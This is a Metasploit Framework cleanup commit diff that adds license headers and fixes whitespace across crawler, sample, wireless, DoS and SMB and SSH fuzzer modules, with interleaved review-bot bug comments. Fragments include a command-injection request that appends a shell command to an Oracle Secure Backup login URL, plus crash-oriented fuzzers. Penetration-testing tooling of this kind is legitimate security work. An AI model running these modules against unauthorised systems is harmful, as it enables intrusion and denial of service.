more cleanups

git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
Joshua Drake
2010-05-03 17:13:09 +00:00
parent df9ec8a08c
commit 0e72894e58
169 changed files with 1487 additions and 946 deletions
+22 -9
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,28 +19,28 @@ require 'uri'
class CrawlerSimple < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/)
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
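Review bot: `if !result['Content-Type'].include? "text/html"` at the top of `parse` calls `include?` on the raw header value, so a response that carries no Content-Type header presumably yields nil here and raises NoMethodError instead of being skipped; `return unless result['Content-Type'].to_s.include?("text/html")` keeps the intent and tolerates the missing header. Whether the framework's result object can return nil for an absent header is not visible on this page, so treat that as something to confirm against the caller. The same guard is repeated in CrawlerForms, CrawlerObjects and CrawlerScripts, and with the Flash media type in CrawlerFlash.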
+33 -21
@@ -1,8 +1,20 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'uri'
$flarebinary = "/home/et/Downloads/flare"
$flareoutdir = "/home/et/Downloads/"
@@ -13,52 +25,52 @@ class CrawlerFlash < BaseParser
rexp = ['loadMovieNum\(\'(.*?)\'',
'loadMovie\(\'(.*?)\'',
'getURL\(\'(.*?)\''
]
]
if !result['Content-Type'].include? "application/x-shockwave-flash"
return
end
outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_'))
puts "Downloading SWF file to: #{outswf}"
ffile = File.new(outswf, "wb")
puts "Downloading SWF file to: #{outswf}"
ffile = File.new(outswf, "wb")
ffile.puts(result.body)
ffile.close
ffile.close
system("#{$flarebinary} #{outswf}")
outflr = outswf.gsub('.swf','.flr')
if File.exists?(outflr)
puts "Decompiled SWF file to: #{outflr}"
puts "Decompiled SWF file to: #{outflr}"
else
puts "Error: Decompilation failed."
return
end
File.open(outflr, "r") do |infile|
while (line = infile.gets)
rexp.each do |r|
links = line.to_s.scan(Regexp.new(r,true)) #"
links.each do |link|
rexp.each do |r|
links = line.to_s.scan(Regexp.new(r,true)) #"
links.each do |link|
begin
hreq = urltohash('GET',link[0],request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
end
end
end
end
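Review bot: `system("#{$flarebinary} #{outswf}")` hands a shell a command string built from `outswf`, which is derived from the crawled `request['uri']` with only `/` replaced by `_`, so any shell metacharacter in a link served by the site being crawled reaches the shell; the argument form `system($flarebinary, outswf)` runs the decompiler without a shell and is the one-line fix. The same lightly sanitised name is used unchanged for `File.new(outswf, "wb")` under `$flareoutdir`, and `ffile.puts(result.body)` appends a newline when the body does not already end in one, so the saved SWF can differ from what was served; `File.open(outswf, "wb") { |f| f.write(result.body) }` preserves the bytes and closes the handle on every path. `File.exists?` is the deprecated spelling of `File.exist?`. The enclosing `parse` method starts before this hunk.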
+33 -20
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerForms < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -21,44 +34,44 @@ class CrawlerForms < BaseParser
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
end
end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
#puts "Parsing form name: #{fname} (#{m})"
#puts "Parsing form name: #{fname} (#{m})"
htmlform = Hpricot(f.inner_html)
arrdata = []
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
data = arrdata.join("&").to_s
begin
hreq = urltohash(m,hr,request['uri'],data)
hreq['ctype'] = 'application/x-www-form-urlencoded'
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
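Review bot: `arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))` concatenates the attribute values directly, so an `<input>` with no `name` or no `value` attribute (a bare submit button, for instance) presumably gets nil from `attributes[...]` and the `+` raises, aborting the whole form rather than just that field; `p.attributes['name'].to_s` and `p.attributes['value'].to_s` keep the field with an empty value. The earlier `fname.empty?` and `f.attributes['method'].empty?` have the same nil exposure. The enclosing `parse` method and its form loop begin before this hunk.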
+20 -7
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerObjects < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -21,15 +34,15 @@ class CrawlerObjects < BaseParser
begin
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
+21 -8
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerScripts < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -20,16 +33,16 @@ class CrawlerScripts < BaseParser
s = obj['src']
begin
hreq = urltohash('GET',s,request['uri'],nil)
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a module's information can be easily serialized
# to a readable format.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a file can be encoded using a framework
# encoder.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates enumerating all of the modules in the framework and
# displays their module type and reference name.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
@@ -1,9 +1,13 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
@@ -1,10 +1,14 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It uses the framework base Framework class so that the
# distribution module path is automatically set, but relies strictly on
# framework core classes for everything else.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
@@ -1,15 +1,14 @@
##
# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
@@ -49,7 +48,7 @@ class Auxiliary::Sample < Msf::Auxiliary
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
end
end
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
module Msf
module Encoders
@@ -28,7 +39,7 @@ class Sample < Msf::Encoder
buf
end
end
end
end
end
end
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
@@ -19,20 +30,23 @@ class Exploits::Sample < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Sample exploit',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'Author' => 'skape',
'Version' => '$Revision$',
'References' =>
[
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
'Targets' =>
[
# Target 0: Windows All
[
[
'Windows Universal',
{
'Platform' => 'win',
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
@@ -30,6 +41,6 @@ module Sample
end
end
end
end
end
end
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -8,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Motorola WR850G v4.03 Credentials',
'Description' => %q{
Login credentials to the Motorola WR850G router with
Login credentials to the Motorola WR850G router with
firmware v4.03 can be obtained via a simple GET request
if issued while the administrator is logged in. A lot
more information is available through this request, but
+1 -1
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7688 $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],
+8 -4
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -44,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary
cmd = datastore['CMD']
uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
req = uri + Rex::Text.uri_encode(cmd)
print_status("Sending command: #{datastore['CMD']}...")
res = send_request_raw({'uri' => req,},5)
print_status("Done.")
end
end
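Review bot: `res = send_request_raw({'uri' => req,},5)` stores the response but `print_status("Done.")` on the next line is printed unconditionally, so a nil response after the 5 second timeout is reported exactly like a successful request; `print_status(res ? "Done." : "No response from the server")` keeps the assignment honest, or drop `res` if the reply is deliberately ignored. The enclosing `run` method starts before this hunk.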
+5 -5
@@ -20,14 +20,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
},
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
+14 -3
@@ -1,15 +1,26 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Frame (File) Injector',
'Description' => %q{
Inspired by Josh Wright's file2air, this module writes
Inspired by Josh Wright's file2air, this module writes
wireless frames from a binary file to the air, allowing
you to substitute some addresses before it gets sent.
Unlike the original file2air (currently v1.1), this module
@@ -62,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
end
close_wifi
end
end
def substaddrs(frame)
tods = (frame[1] & 1) == 1
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -35,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -32,18 +30,17 @@ class Metasploit3 < Msf::Auxiliary
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
[
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
]
]
))
register_options(
[
@@ -1,12 +1,23 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Pi3Web <=2.0.13 ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made
@@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
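Review bot: the `rescue ::Timeout::Error, ::Errno::EPIPE` arm closing the hunk has an empty body, so a timeout or broken pipe ends the run silently while the connection-refused arm just above prints a status line; `rescue ::Timeout::Error, ::Errno::EPIPE => e` followed by `print_status("No response from #{rhost}:#{rport} (#{e.class})")` reports it consistently, or a one-line comment should say that silence is intended because a dropped connection is the expected outcome of this DoS module. The begin block and the method enclosing it start before this hunk.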
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate SMB2 Dialect Corruption',
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -41,27 +41,27 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_negotiate
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
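Review bot: `r = do_smb_negotiate(str, 0.25)` near the end of the `run` hunk passes a bare Float as the `opts` parameter, while `do_smb_negotiate` in the hunk above indexes it with `opts[:timeout]`; Float has no `[]`, so after `sock.put(pkt)` each iteration raises NoMethodError instead of waiting for the reply, and depending on the rescue chain cut off after `rescue ::Interrupt` that either aborts the run or records a spurious `last_err`. `do_smb_negotiate(str, :timeout => 0.25)` is what the signature expects, and `r` is never read. The same call shape appears in the SMB negotiate dialect corruption module (`do_smb_negotiate(str, 0.25)`) and in the SMB create pipe corruption and NTLMv1 login corruption modules (both `do_smb_login(str, 0.25)`); in the SMB create pipe request fuzzer `do_smb_create` ignores `opts`, so the stray float is harmless there.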
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Fuzzer',
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
end
def do_smb_create(pkt,opts={})
@connected = false
connect
@@ -37,21 +37,21 @@ class Metasploit3 < Msf::Auxiliary
@connected = true
smb_create("\\" + pkt)
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_smb_create(str, 0.25)
rescue ::Interrupt
@@ -62,16 +62,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Corruption',
@@ -32,43 +32,43 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"])
], self.class)
end
def do_smb_login(pkt,opts={})
@connected = false
connect
smb_login
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
# Connect in order to get the server-assigned user-id/tree-id
connect
smb_login
pkt = make_smb_create
disconnect
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB create pipe with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -79,42 +79,42 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_create
filename = datastore['SMBPIPE']
disposition = 1
impersonation = 2
pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 24
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['FileNameLen'] = filename.length
pkt['Payload'].v['CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0
pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Disposition'] = disposition
pkt['Payload'].v['Payload'] = filename + "\x00"
pkt.to_s
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate Dialect Corruption',
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -40,27 +40,27 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_negotiate
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -71,21 +71,21 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12']
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB NTLMv1 Login Request Corruption',
@@ -33,37 +33,37 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_login(pkt,opts={})
@connected = false
connect
simple.client.negotiate(false)
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_login
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB login with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -74,23 +74,23 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_login
user = "USER"
domain = "DOMAIN"
hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8)
@@ -102,10 +102,10 @@ class Metasploit3 < Msf::Auxiliary
data << user + "\x00"
data << domain + "\x00"
data << 'Windows 2000 2195' + "\x00"
data << 'Windows 2000 5.0' + "\x00"
data << 'Windows 2000 5.0' + "\x00"
pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['MaxBuff'] = 0xffdf
pkt['Payload'].v['MaxMPX'] = 2
pkt['Payload'].v['VCNum'] = 1
pkt['Payload'].v['VCNum'] = 1
pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
pkt['Payload'].v['Capabilities'] = 64
+13 -13
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 1.5 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(22)
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
ver = make_ssh_version_base
cnt = 0
fuzz_strings do |str|
cnt += 1
pkt = ver + str
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version_base
"SSH-1.5-"
end
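Review bot: in `run`, `pkt = ver + str` prepends the `"SSH-1.5-"` base returned by `make_ssh_version_base`, but the call a few lines later sends the bare string (`r = do_ssh_version(str,:banner_timeout => 5)`), so the version prefix never reaches the wire and `pkt` is dead; `r = do_ssh_version(pkt,:banner_timeout => 5)` is what the naming indicates was intended, and `r` itself is never read. In the crash check that follows, the `if(not @banner)` branch interpolates `last_str.unpack("H*")` without the nil guard the `@connected` branch has, so a missing banner on the very first iteration raises NoMethodError on nil instead of printing the status line. The same two issues are in the SSH 2.0 version fuzzer, and the nil `last_str` one also in the SSH version corruption module. The rescue chain after `rescue ::Interrupt` lies outside the hunk.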
+13 -13
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 2.0 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(22)
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
ver = make_ssh_version_base
cnt = 0
fuzz_strings do |str|
cnt += 1
pkt = ver + str
if(cnt % 100 == 0)
